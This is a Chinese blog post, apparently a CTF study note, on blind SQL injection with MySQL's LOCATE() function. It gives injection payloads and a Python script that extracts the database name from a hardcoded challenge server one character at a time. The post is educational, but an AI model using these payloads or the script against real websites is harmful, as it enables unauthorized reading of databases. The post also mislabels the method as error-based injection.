基于locate()函数的sql盲注

最新推荐文章于 2024-07-15 15:52:42 发布
最新推荐文章于 2024-07-15 15:52:42 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: web安全 ctf 学习笔记 文章标签: sql注入 小白 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/80645842
版权
学习笔记 同时被 3 个专栏收录
21 篇文章 1 订阅
订阅专栏
ctf
18 篇文章 7 订阅
订阅专栏
web安全
16 篇文章 3 订阅
订阅专栏

Locate()

LOCATE(substr,str) , LOCATE(substr,str,pos) 
第一个语法返回字符串 str中子字符串substr的第一个出现位置。第二个语法返回字符串 str中子字符串substr的第一个出现位置, 起始位置在pos。如若substr 不在str中,则返回值为0。

这里主要利用第二个语法进行报错注入:

假设数据库名为security

首先从最基本的:

locate(‘s’,(select database()),1)

表示查询数据库名,并且是从第一位开始,返回字符s第一次出现的位置。

但是仅凭这一句是无法获取特别有用的信息的,但是可以在构造

locate(‘s’,(select database()),1)=1

查询数据库名的第一位开始,如果存在s,并且s的位置等于1,那么等式成立。

综合利用:

select username from security.users where id=1 and (locate(‘s’,(select database()),1)=1)

如果返回值正常,我们就可以认为第一位是s,同理构造

select username from security.users where id=1 and (locate(‘X’,(select database()),n)=n)

将x遍历,n从1开始增加,即可。

不过还有个问题:mysql对字段名的大小写是不敏感的,也就是说会同时出现S和s 满足,都会被记录。

这里可以用binary修饰,表示二进制

select username from security.users where id=1 and (locate(binary’X’,(select database()),n)=n)

转载指明出处

文章同步到我的博客:http://119.23.249.120/archives/271

附上脚本:

import requests
rs = requests.session()
url0="http://120.24.86.145:9004/Once_More.php"
def locate():
    flag = ''
    for j in range(1, 100):
        char_all = '!@$%^&*()_+=-|}{POIU YTREWQASDFGHJKL:?><MNBVCXZqwertyuiop[];lkjhgfdsazxcvbnm,./1234567890`~'
        key = 0
        for i in char_all:
            url = url0+"?id=1'and  (select locate(binary'" + str(
                i) + "',(select database() limit 0,1)," + str(
                j) + "))=" + str(j) + "%23"
            r1 = rs.get(url)
            print (url)
            if "Hello" in r1.text:
                print(str(i) + " -----" + str(j))
                flag += str(i)
                print("[*] : " + flag)
                key = 1
        if key == 0:
            break
locate()


A1ienX
关注
专栏目录
DB2 LOCATE 函数的使用
左脚小提琴的专栏
11-30 1万+
LOCATE 函数 [String] 返回一个字符串在另一个字符串中的位置。  语法 LOCATE( string-expression-1, string-expression-2 [, integer-expression ] )  参数 string-expression-1   被搜索的字符串。 string-
SQL语法学习(4)——LEFT、RIGHT、SUBSTR、LOCATE、LENGTH函数
yeyuanxiaoxin的博客
03-09 592
原始表格: LEFT:截取左边指定长度 SELECT LEFT(Product,7),Product FROM new_schema20200309.new_table RIGHT:截取右边指定长度 SELECT LEFT(Product,7),RIGHT(Product,5),Product FROM new_schema20200309.new_table SUBSTR:截取字段...
SQL locate()函数
中国石油大学 INThe Du Jin Feng
07-07 2728
SQL locate()函数实例代码教程 - 第一个语法返回字符串str第一次出现的子串SUBSTR的位置。 LOCATE(substr,str), LOCATE(substr,str,pos) 第一个语法返回字符串str第一次出现的子串substr的位置。第二个语法返回第一次出现在字符串str的子串substr的位置,从位置pos开始。 substr不在str中,
sqlLOCATE函数
Untara的博客
08-18 1万+
LOCATE(substring,str)返回substring在字符串str中第一次出现的位置 LOCATE(substring,str,pos)返回substring在字符串str的pos位置之后第一次出现的位置。
db2 locate函数、position函数、posstr函数、字符串匹配函数
最新发布
weixin_49114503的博客
07-15 1299
db2 locate函数、position函数、posstr函数、字符串匹配函数
详细分析Mysql中的LOCATE函数(附Demo)
码农研究僧的博客
03-13 8980
LOCATE()函数SQL中用于在字符串中查找子字符串的位置
SQLlocate函数
小树不倒我不倒
11-27 1万+
SELECT * from 表 where locate(‘keyword’, 字段)>0 这个查询出来的就是有这个关键字的部分了类似于like语句,不过 locate() 只要找到返回的结果都大于0(即使是查询的内容就是最开始部分)都可以查出来。 关于性能上边的差距,我现在还没有体会到,还得多深入了解一下。
MySQL中的LOCATE和POSITION函数使用方法
09-11
MySQL中的LOCATE和POSITION函数使用方法 MySQL中的LOCATE和POSITION函数是两个经常被忽视的字符串函数,但它们却提供了非常有用的字符串搜索功能。在本文中,我们将深入探讨LOCATE和POSITION函数的使用方法,以便更...
MySQL高效模糊搜索之内置函数locate instr position find_in_set使用详解
12-16
在本文中,我们将重点讨论四个常用的函数locate()、instr()、position() 和 find_in_set(),并解析它们的使用方法。 1. **locate()** 函数locate() 函数与 Java 的 `indexOf()` 方法类似,用于在一个字符串中...
【MySQLSQLlocate函数
咔咔博客
04-29 4799
author:咔咔 wechat:fangkangfk SELECT * from 表 where locate(‘keyword’, 字段)>0 这个查询出来的就是有这个关键字的部分了类似于like语句,不过 locate() 只要找到返回的结果都大于0 (即使是查询的内容就是最开始部分)都可以查出来。 ...
SQL之查询函数LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
热门推荐
lly983909814的博客
05-11 2万+
LOCATE() 返回要查询的字符串在被查询字符串里第一次出现的位置 注:当在 MySQL 4.0 中时,如有任一参数是一个二进制字符串,它才是字母大小写敏感的 LOCATE(substr,str) 返回substr字符串在str里第一次出现的位置,没有返回0 SELECT LOCATE('.',t.str)FROM `table` t; >5LOCATE(substr,str,
sql server怎么实现mysql 中的locate函数
张子豪的博客
07-25 1079
MySQLLOCATE()函数直接用在sqlServer是不行的,需要替换成CHARINDEX。
mysql LOCATE用法
weixin_39433171的博客
01-01 557
模糊匹配 a表中的字段与B表中的某个字段 update ms_suppcoller a ,`nc` b set a.NC_ACCOUNT=b.`no` where locate(b.`name`,a.suppcoller_name)>0 ;
SQLLocate
luoxinxiaoxiaosheng的专栏
03-03 1376
Locate(substring,string)>0 是查找substring在string中能找到的情况 Locate(substring,string)=0是查找substring不在string中的情况,例如,一个用户表中有14条数据,其中有两条为 harry,terry,当条件Locate('rry',user_name)〉0结果为这两条,当条件Locate('rry',user_name
mysql locate函数_WEB渗透——mysql注入常用函数
weixin_39835991的博客
12-05 118
MYSQL常用函数1、 current_user()当前用户名{通过这个函数去查询当前的用户名,也就是当前是哪个数据库用户}我们打开phpsduty环境,再通过navicat这个工具去连接一下2、 session_user 链接数据库的用户名3、 @@basedir mysql安装路径4、 @@datadir 数据库路径5、 @@version_compile_os 操作系统版本这些函数我们都可以...
MySQL函数Locate的使用
在那一刻,我们或许会发现自己站在了时间的另一岸,以更加成熟和宽广的胸怀,去拥抱那份隔代相传的深情。
11-20 901
用途LOCATE和INSTR用于查找子字符串在字符串中的位置,而LIKE用于基于模式的字符串匹配。返回值LOCATE和INSTR返回子字符串首次出现的位置(从1开始),如果未找到则返回0。LIKE不返回任何值,而是根据匹配结果过滤行。参数LOCATE和INSTR的参数主要是字符串和子字符串,而LIKE主要与WHERE子句一起使用,并接受带有通配符的模式字符串。性能:在大型数据集上,LIKE特别是与开头的模式一起使用时,可能会比LOCATE或INSTR慢,因为开头的模式通常无法利用索引。
MYSQL注入特殊技巧学习
小刚的博客
05-01 327
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 SQL注入技巧SQL小技巧1,运算逻辑符号or替代and替代异或运算符 ”^”逗号空格等于号”=”2,盲注函数被过滤left(str, length)right(str,length)mid(str,start,length)Locate(substr,str)position (sub...
sql 中的LOCATE函数
05-19
SQL中的LOCATE函数用于查找字符串中第一个子字符串出现的位置。它的语法如下: ``` LOCATE(substring, string, start) ``` 其中,`substring`是要查找的子字符串,`string`是要在其中查找子字符串的字符串,`start...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值